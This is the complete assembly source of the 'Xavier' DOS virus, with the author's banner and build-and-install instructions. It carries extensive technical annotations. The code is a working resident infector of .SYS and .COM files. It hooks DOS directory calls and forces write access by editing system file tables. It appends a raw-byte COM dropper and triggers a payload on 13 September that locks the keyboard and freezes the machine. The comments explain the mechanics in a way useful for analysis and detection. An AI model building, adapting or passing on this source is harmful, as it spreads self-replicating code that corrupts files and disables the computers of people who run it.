SLAM3.013: The Xavier Virus by Xavirus Hacker
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; V I R U S ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;€; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € ‹flflfl‹ € € € ‹flflflflflfl fl€flflflflfl‹ €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; fl€fl € € € € € €flflflfl € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ‹€‹ €flflfl€ € € € € €‹‹‹‹fl €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € fl‹‹‹‹‹ € € fl; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; MADE IN LUQUE, PARAGUAY. By Xavirus Hacker ‹; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; TSR infector of SYS/COM programs. ; ; ; ; ; ;
; ; ; Infects when an FCB operation is made (DIR, COPY, etc.) ; ; ; ; ; ;
; ; ; The victim is opened in read only mode, then is turned ; ; ; ; ; ;
; ; ; into read/write mode, and the attributes are kicked. ; ; ; ; ; ;
; ; ; Bestial & psychedelic payload on September 13. ; ; ; ; ; ;
; ; ; Time/Date/Attributes preserved. ; ; ; ; ; ;
; ; ; Doesn't reinfect SYS or COM files (hehehehehe). ; ; ; ; ; ;
; ; ; With thanx to Dark Angel. ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; How to make the virus work: ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; Tasm Xavier.Asm * Tlink Xavier.Obj ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; Exe2Bin Xavier.Exe * Ren Xavier.Bin Xavier.Sys; ; ; ; ; ; ; ; ; ;
; ; ; ; ; Load it as a device in your config.sys and that's all.; ; ; ; ; ; ; ; ;
.MODEL TINY
.CODE
ORG 0h
; 16-bit TASM, Intel syntax, real-mode DOS.  The image is a DOS device driver
; (.SYS, built with EXE2BIN as described in the header) loaded from CONFIG.SYS.
; DOS calls the strategy routine and then the interrupt routine with the
; request header in ES:BX.  This 18-byte header layout is rebuilt in
; NuevaCabecera when a victim SYS file is infected (see PudrirSYS), so the
; offsets here are what the infector arithmetic depends on.
Cabecera:
Siguiente_Cabecera dw 0ffffh,0ffffh      ; next-driver pointer (offset, segment); FFFF:FFFF = last driver in this file
Atributo dw 8000h                        ; device attribute word, bit 15 set = character device
restrategica dw offset Estrategica       ; strategy-routine entry (offset within the driver segment)
rinterrupt dw offset Interrupcion        ; interrupt-routine entry
BautizadoComo db 'XAVIER! '              ; 8-byte character-device name (also a static detection string)
FinDeCabecera:
; Strategy routine.  DOS far-calls it with ES:BX = request header; all it does
; is store that pointer in GuardarBX/GuardarES for the interrupt routine.
; Data is addressed through BP (CALL/POP delta) because the same code is later
; appended to victim SYS files at an unknown offset, so assembled offsets are
; not valid at run time there.  Clobbers nothing (BP is saved and restored).
Estrategica:
Push bp
Call DeltaEstrategica
DeltaEstrategica:
Pop bp                                   ; bp = run-time offset of DeltaEstrategica
Mov cs:[bp+offset GuardarBX-offset DeltaEstrategica],bx
Mov cs:[bp+offset GuardarES-offset DeltaEstrategica],es
Pop bp
retf
; Bridge for the short conditional jumps at the top of Interrupcion that need
; to reach SalirInterrupcion (presumably out of range for an 8-bit Jcc
; displacement on the 8086 this is assembled for).
Puente:
Jmp SalirInterrupcion
; Interrupt routine (request handler) and the INIT-time installer.
; Only command code 0 (INIT) is handled; every other request gets status
; 8103h (error + done, error code 3 = unknown command).  On INIT it:
;   1. asks "are you there?" via INT 21h AX=5841h ('XA' in TASM byte order);
;      Interrupcion21h answers CX='V!'.  If already resident, the end address
;      is left at the header start and the error status stands, so DOS keeps
;      nothing of this copy.
;   2. otherwise keeps itself resident up to FinMonton, saves the INT 21h
;      vector into the far-CALL operand Vieja21h, points INT 21h at
;      Interrupcion21h and returns status 0100h (done).
;   3. if the DOS date is 13 September, runs the payload below and never
;      returns (keyboard IRQ masked, endless loop).
; ES:BX = request header throughout the INIT part.  Saved registers are restored
; by SalirInterrupcion.
Interrupcion:
Push bp
Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si
Push cs
Pop ds
Call DeltaInterrupcion
DeltaInterrupcion:
Pop bp                                   ; bp = run-time offset of DeltaInterrupcion
Les bx,cs:[bp+GuardarBX-DeltaInterrupcion]   ; ES:BX = request header (GuardarBX and GuardarES are adjacent words)
Mov es:[bx+3],8103h                      ; default status word: error | done, code 3 (unknown command)
Cmp Byte ptr es:[bx+2],0                 ; command code 0 = INIT
Jnz Puente                               ; anything else: leave the error status and return
Mov es:[bx+10h],cs                       ; INIT reply: end-address segment
Lea si,[bp+Cabecera-DeltaInterrupcion]
Mov es:[bx+0eh],si                       ; end-address offset = start of header, i.e. keep nothing (for now)
Dec Byte ptr es:[bx+3]                   ; status becomes 8102h
Mov ax,'XA'                              ; residency probe: AX = 5841h, handled by Interrupcion21h
Int 21h
Cmp cx,'V!'
Jz Puente                                ; already resident: do not install a second copy
Add Word ptr es:[bx+0eh],offset FinMonton    ; stay resident: end offset = header + whole image incl. work area
Mov es:[bx+3],0100h                      ; status = done, no error
Mov ax,03521h                            ; get INT 21h vector -> ES:BX
Int 21h
Mov Word ptr cs:[bp+Vieja21h-DeltaInterrupcion],bx       ; patch the old vector into the CALL FAR operand (self-modifying)
Mov Word ptr cs:[bp+Vieja21h+2-DeltaInterrupcion],es
Lea dx,[bp+Interrupcion21h-DeltaInterrupcion]
Push cs
Pop ds
Mov ax,02521h                            ; set INT 21h vector = DS:DX (our hook)
Int 21h
Mov ah,2ah                               ; get date: DH = month, DL = day
Int 21h
Cmp dh,09
Jne SalirInterrupcion
Cmp dl,13d
Jne SalirInterrupcion                    ; trigger only on 13 September
; ---- payload: never returns ----
in al,21h                                ; mask IRQ1 (keyboard) in the master PIC
or al,02
out 21h,al
Mov ax,0013h                             ; VGA mode 13h (320x200, 256 colours)
Int 010h
Sub ax,ax
Mov ds,ax                                ; DS = 0 to reach the BIOS data area
Xor si,si                                ; si = current fill colour (0..255)
Blink:
Mov bx,0417h                             ; BDA keyboard shift-state byte
Mov Byte ptr [bx],16d                    ; scroll-lock bit, then num-lock, then caps-lock, with a delay each (LED/flag blinking)
Call Retardo
Mov Byte ptr [bx],32d
Call Retardo
Mov Byte ptr [bx],64d
Call Retardo
Push bx
Push ds
Push cs
Pop ds
Mov ax,0201h                             ; BIOS: read 1 sector
Lea bx,bp+FinMonton                      ; buffer ES:BX; ES is not set here (request-header segment on the first pass, A000h afterwards)
Mov cx,0202                              ; cylinder 2, sector 2
Mov dh,1                                 ; head 1
Mov dl,1                                 ; drive B:
Int 13h
Mov ax,0201h
Mov dl,0                                 ; then drive A: (status/CF ignored both times; this is just drive activity)
Int 13h
Pop ds
Pop bx
Inc si
Cmp si,255
jbe Here
Xor si,si                                ; wrap the colour back to 0
Here:
Mov di,0a000h
Mov es,di                                ; ES = VGA frame buffer
Mov cx,65535d
Mov ax,si
Repe Stosb                               ; fill 65535 bytes of A000h with colour AL; leaves CX = 0
Loop Blink                               ; CX is 0, so LOOP wraps it to FFFFh and always jumps: endless
; Delay used by the payload.  Polls the keyboard buffer (INT 16h/01h; the ZF
; result is never examined, and IRQ1 is masked by then anyway) and then spins
; 30000 dummy port reads.  Clobbers AX, CX and flags.
; It sits directly after "Loop Blink", so it is also where control would fall
; if that loop ever terminated.
Retardo:
Mov ah,01h
Int 16h
Mov cx,30000d
Pausa:
in al,4Fh                                ; port read used purely as a time sink
Loop Pausa
ret
; Common exit of the interrupt routine: restore the registers pushed at
; Interrupcion (reverse order) and far-return to DOS.
SalirInterrupcion:
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
retf
db ' [XAVIER!] by Xavirus Hacker '       ; signature text, never referenced by code; usable as a scan string
; INT 21h hook installed by Interrupcion.
;   * AX = 5841h ('XA'): residency probe.  Answers CX = 'V!' with a plain IRET;
;     such a call never reaches DOS.
;   * everything else: chains to the original handler with PUSHF + CALL FAR
;     (the CALL operand Vieja21h is patched in at install time), copies the
;     flags DOS returned into the caller's IRET frame so CF/ZF are preserved,
;     then inspects the function number: FCB Find First (AH=11h) and Find Next
;     (AH=12h) continue into the infector, any other function returns.
;   Infection therefore piggybacks on directory listings and FCB-based copies,
;   as the file header says.
Interrupcion21h:
Cmp ax,'XA'
Jnz ContinuarInt21h
Mov cx,'V!'
SalirInt21h:
iret
db 'XH'                                  ; two stray bytes, never referenced
ContinuarInt21h:
Pushf
db 09ah                                  ; CALL FAR opcode; the 4 bytes that follow are its target
Vieja21h dw 0,0                          ; original INT 21h vector (offset, segment), written by the installer
; Frame after the chained call and the pushes below:
;   [bp+0]=AX [bp+2]=BP [bp+4]=flags DOS returned [bp+6]=IP [bp+8]=CS [bp+10]=flags pushed by INT
; The last slot is overwritten with the returned flags so the final IRET hands them to the caller.
Pushf
Push bp
Push ax
Mov bp,sp
Mov ax,[bp+4]
Mov [bp+10],ax
Pop ax
Pop bp
Popf
Cmp ah,11h                               ; FCB Find First
Je UsanFileControlBlock
Cmp ah,12h                               ; FCB Find Next
Je UsanFileControlBlock
iret
; Infector entry, reached after DOS has completed an FCB Find First/Next.
; AL = FFh (no match) exits at once.  Otherwise the directory entry DOS put in
; the DTA supplies the file name and size; only *.SYS and *.COM are considered.
; The file is opened read-only (3D00h) and its first 3 bytes read into Buffer:
;   - first word "MZ"/"ZM" (an EXE with a .COM/.SYS name): skip.
;   - .COM: a first byte of E9h (JMP) is taken as "already infected" and
;     skipped (this also spares any clean COM that happens to start with a
;     JMP); anything else goes to PudrirCOM.
;   - .SYS: infected only if the first word is FFFFh (next-driver offset of a
;     single-driver file).  PudrirSYS overwrites that word with the original
;     size, so an infected SYS - and any legitimate multi-driver SYS - fails
;     this test.
; Register roles: BP = load delta, DI = 0 for SYS / 32 for COM, BX = handle
; once opened.  All registers are saved here and restored at
; RetornoDeLaInt21h, which IRETs to the original INT 21h caller.
UsanFileControlBlock:
Cmp al,0ffh                              ; FFh = nothing found
Je SalirInt21h
Push bp
Call OtroDelta
OtroDelta:
Pop bp
Sub bp,offset OtroDelta                  ; bp = load delta (0 in the original image, non-zero in an infected SYS)
Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si
Push di
Mov ah,2fh                               ; get DTA -> ES:BX (holds the found entry)
Int 21h
Cmp Byte ptr es:[bx],0ffh                ; extended-FCB search result: skip its 7-byte prefix
Jnz FCBnormal
Add bx,0007h
FCBnormal:
Mov cx,es:[bx+1dh]                       ; low word of the file size (drive byte + dir-entry offset 1Ch); high word ignored
Mov cs:[bp+Grandor],cx
Push es
Pop ds
Push cs
Pop es
cld
Lea di,bp+Victima                        ; build "NAME.EXT",0 in Victima from the 8+3 entry
Mov si,bx
Inc si
Mov cx,0008h
Seguir:
Cmp Byte ptr ds:[si],20h                 ; name is space padded
Jz Termino
Movsb
loop Seguir
Termino:
Mov al,"."
Stosb
Lea si,[bx+9]                            ; extension field of the entry
Mov ax,'YS'                              ; TASM order: AH='Y', AL='S' -> word matches "SY", then AL matches the 3rd char
Cmp Word ptr [si],ax
Jne PuedeSerCOM
stosw
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Xor cx,cx                                ; CX = 0 marks SYS (copied to DI below)
Jmp short surivaX
PuedeSerCOM:
Mov ax,'OC'                              ; "CO"
Cmp Word ptr [si],ax
Jne RetornoDeLaInt21h
stosw
Mov al,'M'
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Mov cx,32d                               ; CX = 32 marks COM
surivaX:
Xor ax,ax
Stosb                                    ; NUL-terminate the ASCIZ name
Push cs
Pop ds
Mov di,cx
Mov ax,3d00h                             ; open read-only; write access is obtained later by editing the SFT, not by DOS
Lea dx,bp+Victima
Int 21h
xchg bx,ax ; handle -> BX.  XCHG with AX is the 1-byte 93h form and does not alter flags, so CF below is still DOS's
jc RetornoDeLaInt21h
Mov ah,3fh                               ; read the first 3 bytes
Mov cx,0003d
Lea dx,bp+buffer
Int 21h
Cmp Word ptr ds:[bp+buffer],'MZ'         ; both byte orders are tested, so this is a plain EXE-signature check
Je Vamos
Cmp Word ptr ds:[bp+buffer],'ZM'
Je Vamos
Cmp di,32d
Je Revisar
Inc Word ptr ds:[bp+buffer]              ; SYS: FFFFh + 1 = 0 -> next-driver word untouched -> infectable
Jz Putrefaccion
Jmp short Vamos
Revisar:
Cmp Byte ptr ds:[bp+buffer],0e9h         ; COM already starting with JMP: assume infected
Jne PudrirCOM
Vamos:
Mov ah,3eh                               ; close the handle
Int 21h
RetornoDeLaInt21h:
Pop di
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
iret
; Hop to the SYS infector; the JZ in UsanFileControlBlock cannot reach
; PudrirSYS directly (short displacement only).
Putrefaccion:
Jmp PudrirSYS
; COM infector.  Appends the 16Fh-byte dropped virus (the bytes at VirusXavier
; through BeastName, which includes the patched JMP in Salto and the victim's
; original 3 bytes in Buffer) to the end of the open file and writes a 3-byte
; JMP to it at offset 0.  Expects BX = handle, DS = CS, BP = delta.
;   ModificarSFT - make the read-only handle writable, clear file attributes
;   5700h        - read date/time
;   4202h        - seek to end; AX = size.  Only the low word is used and there
;                  is no size check, so a COM near 64K would be corrupted
;   write body, seek to 0, write JMP
;   Restoring    - put the attribute byte back in the SFT
;   5701h        - restore the date, with the seconds field of the time forced
;                  to 31 (= 62 s).  That odd timestamp is the infection marker
;                  (the resident code here never tests it; only the E9h check
;                  in UsanFileControlBlock does).
PudrirCOM:
Push ds
Pop es
Call ModificarSFT
Mov ax,5700h                             ; get file date/time -> DX:CX
Int 21h
Push cx
Push dx
Mov ax,4202h                             ; seek to end, DX:AX = file size
cwd
Xor cx,cx
Int 21h
Sub ax,3
Mov Word ptr ds:[bp+Salto+1],ax          ; JMP displacement: 103h + (size-3) = 100h + size = start of appended code
Lea dx,bp+VirusXavier
Mov ah,40h                               ; write 16Fh bytes at the end of the file
Mov cx,016fh
Int 21h
Mov ax,4200h                             ; seek to offset 0
Sub dx,dx
Sub cx,cx
Int 21h
Lea dx,bp+Salto
Mov ah,40h                               ; overwrite the first 3 bytes with the JMP
Mov cx,3
Int 21h
Call Restoring
Pop dx
Pop cx
and cl,11100000b                         ; time bits 0-4 (seconds/2) := 31 -> marker
or cl,00011111b
Mov ax,5701h                             ; set file date/time
Int 21h
Jmp Vamos
; Reach the System File Table entry behind handle BX through the DOS-internal
; INT 2Fh services (1220h: JFT entry for handle -> ES:DI holds the SFT index;
; 1216h: SFT entry for index BX -> ES:DI) and edit it directly, bypassing the
; checks a normal read/write open would do:
;   SFT+4   file attribute: saved to FileAtributo, then set to 20h (archive
;           only), dropping read-only/hidden/system
;   SFT+2   open mode: forced to 2 (read/write) although the handle was opened
;           read-only
;   SFT+15h file position (dword): reset to 0
; Assumes the DOS 3+ SFT layout.  Leaves ES:DI on the SFT entry, which
; Restoring relies on.  BX preserved; AX, CX, ES, DI clobbered.
ModificarSFT:
Push bx
Mov ax,1220h
Int 2fh
Mov ax,1216h
Xor bh,bh
Mov bl,es:[di]                           ; SFT index from the JFT byte
Int 2fh
Mov cl,Byte ptr es:[di+4]
Mov Byte ptr cs:[bp+FileAtributo],cl
Mov Byte ptr es:[di+4],20h
Mov Byte ptr es:[di+2],02
Mov Word ptr es:[di+015h],00
Mov Word ptr es:[di+017h],00
Pop bx
ret
; Put the original attribute byte back into the SFT entry.  ES:DI must still
; point at the entry located by ModificarSFT (the INT 21h calls in between do
; not change them).  Clobbers CL.
Restoring:
Mov cl,Byte ptr cs:[bp+FileAtributo]
Mov Byte ptr es:[di+4],cl
ret
; SYS infector.  Appends a second device driver to the open file: a fresh
; 18-byte header (NuevaCabecera) followed by this driver's code from
; FinDeCabecera up to Monton, and links it into the victim's driver chain.
;   NuevaCabecera: next = FFFF:FFFF, attribute 8000h, strategy/interrupt =
;   original size + (routine - Cabecera), which is where the routines land once
;   the header is written at file offset Grandor.
;   Because ModificarSFT reset the position to 0, the first write (2 bytes of
;   Grandor) lands on the victim's own next-driver offset word: DOS treats a
;   non-FFFFh value there as the offset of a further driver in the same file,
;   so the appended copy is loaded too.  That same word is the reinfection
;   marker checked in UsanFileControlBlock.
; Only 18 bytes are written from NuevaCabecera, which is 10 bytes long, so the
; device name of the appended header is whatever follows in memory (Grandor,
; FileAtributo, GuardarBX, GuardarES, first byte of Hora).
; The work area Monton..FinMonton is not written to the victim.  Date/time are
; restored unchanged (no timestamp marker for SYS).  Expects BX = handle,
; DS = CS, BP = delta.
PudrirSYS:
Push ds
Pop es
Mov Word ptr ds:[bp+NuevaCabecera+4],8000h       ; attribute: character device
Mov cx,cs:[bp+Grandor]
Add cx,(offset Estrategica-offset Cabecera)
Mov Word ptr ds:[bp+NuevaCabecera+6],cx          ; strategy offset in the infected file
Add cx,(offset Interrupcion-offset Estrategica)
Mov Word ptr cs:[bp+NuevaCabecera+8],cx          ; interrupt offset
Mov Word ptr cs:[bp+NuevaCabecera+0],0ffffh      ; end of chain
Mov Word ptr cs:[bp+NuevaCabecera+2],0ffffh
Call ModificarSFT
Mov ax,5700h                             ; get file date/time -> DX:CX
Int 21h
Push cx
Push dx
Mov ah,40h                               ; at position 0: overwrite the next-driver offset word with the original size
Mov cx,0002
Lea dx,bp+Grandor
Int 21h
Mov ax,4202h                             ; seek to end
Xor cx,cx
cwd
Int 21h
Mov ah,40h                               ; append the new header (18 bytes)
Mov cx,18d
Lea dx,bp+NuevaCabecera
Int 21h
Mov ah,40h                               ; append the code body
Mov cx,(offset Monton-offset FinDeCabecera)
Lea dx,bp+FinDeCabecera
Int 21h
Call Restoring
Pop dx
Pop cx
Mov ax,5701h                             ; restore file date/time
Int 21h
Jmp Vamos
; Pre-assembled COM infector, dropped into .COM victims by PudrirCOM.
; The 16Fh (367) bytes written there are: these 350 bytes of code, Salto (3),
; Buffer (7) and BeastName (7).  Not analysed in detail here; from the opcodes
; it uses the same CALL/POP delta idiom (E8 00 00 5D), reads and sets the
; INT 21h and INT 24h vectors (B8 21 35 / B8 21 25 / B8 24 35 / B8 24 25)
; and contains the same seconds=31 timestamp test (80 E1 1F 80 F9 1F).
VirusXavier: ; 016f bytes, virus to be dropped. TSR (IVT) COM fast infector.
db 0e8h,000h,000h,05dh,081h,0edh,003h,001h,033h,0c9h,08eh,0c1h,0fch,026h,081h,03eh
db 004h,002h,081h,0edh,074h,02ch,0b8h,021h,035h,0cdh,021h,08ch,086h,07eh,001h,089h
db 09eh,07ch,001h,033h,0d2h,0bfh,000h,002h,08eh,0c2h,0b9h,06fh,001h,08dh,0b6h,000h
db 001h,0f3h,0a4h,0cch,006h,01fh,0b8h,021h,025h,0bah,05bh,002h,0cdh,021h,033h,0c0h
db 033h,0d2h,02bh,0dbh,00eh,00eh,01fh,007h,08bh,0cbh,0bfh,000h,001h,08dh,0b6h,061h
db 002h,057h,0a4h,0a5h,02bh,0ffh,033h,0edh,02bh,0f6h,0c3h,09ch,03dh,000h,03dh,074h
db 025h,03dh,001h,03dh,074h,020h,080h,0fch,04bh,074h,01bh,080h,0fch,041h,074h,016h
db 080h,0fch,043h,074h,011h,080h,0fch,056h,074h,00ch,09dh,0eah,000h,000h,000h,000h
db 0b0h,003h,0cfh,0e9h,0b5h,000h,050h,053h,051h,052h,056h,057h,01eh,006h,052h,01eh
db 0b8h,024h,035h,0cdh,021h,02eh,08ch,006h,066h,003h,02eh,089h,01eh,064h,003h,00eh
db 01fh,0b8h,024h,025h,0bah,080h,002h,0cdh,021h,01fh,05ah,01eh,007h,0fch,08bh,0fah
db 0b9h,07dh,000h,0b0h,02eh,0f2h,0aeh,075h,0cah,087h,0f7h,0adh,00dh,020h,020h,03dh
db 063h,06fh,075h,077h,0ach,00ch,020h,03ch,06dh,075h,070h,0b8h,002h,03dh,0cdh,021h
db 072h,069h,093h,00eh,00eh,01fh,007h,0b8h,000h,057h,0cdh,021h,089h,016h,02ah,003h
db 089h,00eh,02dh,003h,080h,0e1h,01fh,080h,0f9h,01fh,074h,04bh,0b4h,03fh,0bah,061h
db 003h,0b9h,003h,000h,0cdh,021h,08bh,0f2h,08bh,004h,002h,0e0h,080h,0fch,0a7h,074h
db 036h,0e8h,051h,000h,03dh,000h,0fah,073h,02eh,02dh,003h,000h,0a3h,05fh,003h,0b4h
db 040h,0bah,000h,002h,0b9h,06fh,001h,0cdh,021h,0e8h,034h,000h,0bah,05eh,003h,0b4h
db 040h,0b9h,003h,000h,0cdh,021h,0b8h,001h,057h,0bah,000h,000h,0b9h,000h,000h,080h
db 0e1h,0e0h,080h,0c9h,01fh,0cdh,021h,0b4h,03eh,0cdh,021h,02eh,0c5h,016h,064h,003h
db 0b8h,024h,025h,0cdh,021h,007h,01fh,05fh,05eh,05ah,059h,05bh,058h,0e9h,02ah,0ffh
db 0b8h,000h,042h,0ebh,003h,0b8h,002h,042h,02bh,0c9h,099h,0cdh,021h,0c3h
Salto db 0e9h,000h,000h                  ; JMP rel16 written to offset 0 of a COM victim; displacement patched by PudrirCOM
Buffer db 090h,0cdh,020h,000h,000h,000h,000h   ; default NOP / INT 20h; the victim's original first 3 bytes are read over it before the drop
BeastName db 'XAVIER!'                   ; trailing signature that travels with the dropped COM code
; Resident work area.  It is kept in memory (the INIT end address is FinMonton)
; but not copied into SYS victims (that write stops at Monton); every field
; used by the code is written before it is read.  Hora and Fecha are not
; referenced by any code in this file.
Monton:
Victima db 13d dup (0)                   ; ASCIZ "NAME.EXT" of the current victim (8 + '.' + 3 + NUL)
NuevaCabecera db 10d dup (0)             ; device header built for SYS victims (18 bytes are written from here)
Grandor dw 01d dup (0)                   ; low word of the victim's size (from the DTA entry)
FileAtributo db 0                        ; SFT attribute byte saved by ModificarSFT
GuardarBX dw 0                           ; request-header pointer saved by Estrategica (offset, then segment)
GuardarES dw 0
Hora dw 0
Fecha dw 0
FinMonton:
End